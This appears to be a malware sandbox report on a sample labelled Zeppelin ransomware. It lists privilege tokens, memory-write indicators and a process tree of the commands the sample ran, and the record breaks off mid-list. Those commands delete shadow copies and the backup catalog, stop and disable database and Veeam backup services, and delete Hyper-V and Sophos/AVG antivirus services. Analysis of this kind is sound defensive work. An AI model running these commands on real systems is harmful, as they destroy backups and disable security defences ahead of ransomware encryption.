Token: 36	2496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: 36	3648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeSecurityPrivilege	2496	WMIC.exe
Token: SeTakeOwnershipPrivilege	2496	WMIC.exe
Token: SeLoadDriverPrivilege	2496	WMIC.exe
Token: SeSystemProfilePrivilege	2496	WMIC.exe
Token: SeSystemtimePrivilege	2496	WMIC.exe
Token: SeProfSingleProcessPrivilege	2496	WMIC.exe
Token: SeIncBasePriorityPrivilege	2496	WMIC.exe
Token: SeCreatePagefilePrivilege	2496	WMIC.exe
Token: SeBackupPrivilege	2496	WMIC.exe
Token: SeRestorePrivilege	2496	WMIC.exe
Token: SeShutdownPrivilege	2496	WMIC.exe
Token: SeDebugPrivilege	2496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2496	WMIC.exe
Token: SeRemoteShutdownPrivilege	2496	WMIC.exe
Token: SeUndockPrivilege	2496	WMIC.exe
Token: SeManageVolumePrivilege	2496	WMIC.exe
Token: 33	2496	WMIC.exe
Token: 34	2496	WMIC.exe
Token: 35	2496	WMIC.exe
Token: 36	2496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.execmd.execmd.exe

description	pid	process	target process
PID 4200 wrote to memory of 3828	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 3828	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 3828	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4692	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4692	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4692	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4144	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4144	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4144	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4212	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4212	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4212	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 2688	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 2688	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 2688	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4148	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4148	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 4148	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 4200 wrote to memory of 5000	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 4200 wrote to memory of 5000	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 4200 wrote to memory of 5000	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 4200 wrote to memory of 2340	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 4200 wrote to memory of 2340	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 4200 wrote to memory of 2340	4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 3828 wrote to memory of 2496	3828	cmd.exe	WMIC.exe
PID 3828 wrote to memory of 2496	3828	cmd.exe	WMIC.exe
PID 3828 wrote to memory of 2496	3828	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 3648	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 3648	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 3648	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 4772	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 4772	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 4772	4148	cmd.exe	WMIC.exe
PID 4148 wrote to memory of 3368	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3368	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3368	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1324	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1324	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1324	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4244	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4244	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4244	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2676	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2676	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2676	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4120	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4120	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4120	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2888	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2888	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2888	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1712	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1712	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 1712	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3152	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3152	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3152	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2864	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2864	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 2864	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3880	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3880	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 3880	4148	cmd.exe	sc.exe
PID 4148 wrote to memory of 4984	4148	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
"C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:4212
- C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe" -agent 1
  2⤵
  PID:2340
- C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe" -agent 0
  2⤵
  - Drops file in Program Files directory
  PID:5000
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3648
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    WMIC.exe shadowcopy delete /nointeractive
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start=disabled
    3⤵
    - Launches sc.exe
    PID:1324
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$CITRIX
    3⤵
    - Launches sc.exe
    PID:4120
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$CITRIX start=disabled
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSOLAP$CITRIX
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\sc.exe
    sc config MSOLAP$CITRIX start=disabled
    3⤵
    - Launches sc.exe
    PID:5052
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS start=disabled
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\sc.exe
    sc stop postgresql-9.5
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\sc.exe
    sc config postgresql-9.5 start=disabled
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsdevcon
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\sc.exe
    sc config fsdevcon start=disabled
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\sc.exe
    sc stop fshoster
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\sc.exe
    sc config fshoster start=disabled
    3⤵
    - Launches sc.exe
    PID:3932
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsnethoster
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc config fsnethoster start=disabled
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulhoster
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulhoster start=disabled
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulnethoster
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulnethoster start=disabled
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulorsp
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulorsp start=disabled
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulprothoster
    3⤵
    PID:3656
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulprothoster start=disabled
    3⤵
    - Launches sc.exe
    PID:2648
- - C:\Windows\SysWOW64\sc.exe
    sc stop FSAUS
    3⤵
    - Launches sc.exe
    PID:1632
- - C:\Windows\SysWOW64\sc.exe
    sc config FSAUS start=disabled
    3⤵
    PID:992
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsms
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\sc.exe
    sc config fsms start=disabled
    3⤵
    - Launches sc.exe
    PID:4568
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAWSSvc
    3⤵
    PID:3692
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAWSSvc start=disabled
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAzureSvc
    3⤵
    - Launches sc.exe
    PID:3516
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAzureSvc start=disabled
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamEnterpriseManagerSvc
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamEnterpriseManagerSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1596
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupRESTSvc
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupRESTSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:4848
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupSvc
    3⤵
    - Launches sc.exe
    PID:4440
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamFilesysVssSvc
    3⤵
    PID:60
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamFilesysVssSvc start=disabled
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBrokerSvc
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBrokerSvc start=disabled
    3⤵
    PID:216
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupCdpSvc
    3⤵
    - Launches sc.exe
    PID:972
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupCdpSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:4992
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCloudSvc
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCloudSvc start=disabled
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamTransportSvc
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamTransportSvc start=disabled
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDistributionSvc
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDistributionSvc start=disabled
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamExplorersRecoverySvc
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamExplorersRecoverySvc start=disabled
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGCPSvc
    3⤵
    PID:316
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGCPSvc start=disabled
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGuestHelper
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGuestHelper start=disabled
    3⤵
    - Launches sc.exe
    PID:1544
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCatalogSvc
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCatalogSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1100
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamHvIntegrationSvc
    3⤵
    - Launches sc.exe
    PID:5096
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamHvIntegrationSvc start=disabled
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDeploySvc
    3⤵
    PID:4508
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDeploySvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1392
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamMountSvc
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamMountSvc start=disabled
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamRESTSvc
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamRESTSvc start=disabled
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamNFSSvc
    3⤵
    - Launches sc.exe
    PID:3632
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamNFSSvc start=disabled
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamVssProviderSvc
    3⤵
    PID:3656
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamVssProviderSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:352
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    - Launches sc.exe
    PID:5044
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start= disabled
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$VEEAMSQL2016
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$VEEAMSQL2016 start=disabled
    3⤵
    - Launches sc.exe
    PID:2756
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:524
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    - Launches sc.exe
    PID:4936
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\sc.exe
    sc stop SageMySQL
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\sc.exe
    sc config SageMySQL start=disabled
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\sc.exe
    sc stop ReportServer$V4SQLEXPRESS
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\sc.exe
    sc config ReportServer$V4SQLEXPRESS start=disabled
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$SDPRO_V4_SQL
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled
    3⤵
    PID:4444
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$MICROSOFT##WID
    3⤵
    - Launches sc.exe
    PID:4608
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$MICROSOFT##WID start=disabled
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLServerOLAPService
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLServerOLAPService start=disabled
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    - Launches sc.exe
    PID:972
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:492
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    - Launches sc.exe
    PID:1348
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY
    3⤵
    - Launches sc.exe
    PID:3100
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\sc.exe
    sc stop MsDtsServer130
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\sc.exe
    sc config MsDtsServer130 start=disabled
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$BVMS
    3⤵
    - Launches sc.exe
    PID:3344
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$BVMS start=disabled
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS2014
    3⤵
    - Launches sc.exe
    PID:1416
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS2014 start=disabled
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    - Launches sc.exe
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    - Launches sc.exe
    PID:4432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    - Launches sc.exe
    PID:4988
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    - Launches sc.exe
    PID:3320
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    - Launches sc.exe
    PID:4368
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    - Launches sc.exe
    PID:2432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    - Launches sc.exe
    PID:4028
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    PID:3196
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    - Launches sc.exe
    PID:2664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    - Launches sc.exe
    PID:3848
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    - Launches sc.exe
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    - Launches sc.exe
    PID:4008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    - Launches sc.exe
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    - Launches sc.exe
    PID:4980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    PID:32
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    - Launches sc.exe
    PID:2984
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    - Launches sc.exe
    PID:4772
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    - Launches sc.exe
    PID:220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    - Launches sc.exe
    PID:3808
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    PID:3372
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    PID:772
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    - Launches sc.exe
    PID:3092
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    - Launches sc.exe
    PID:4448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
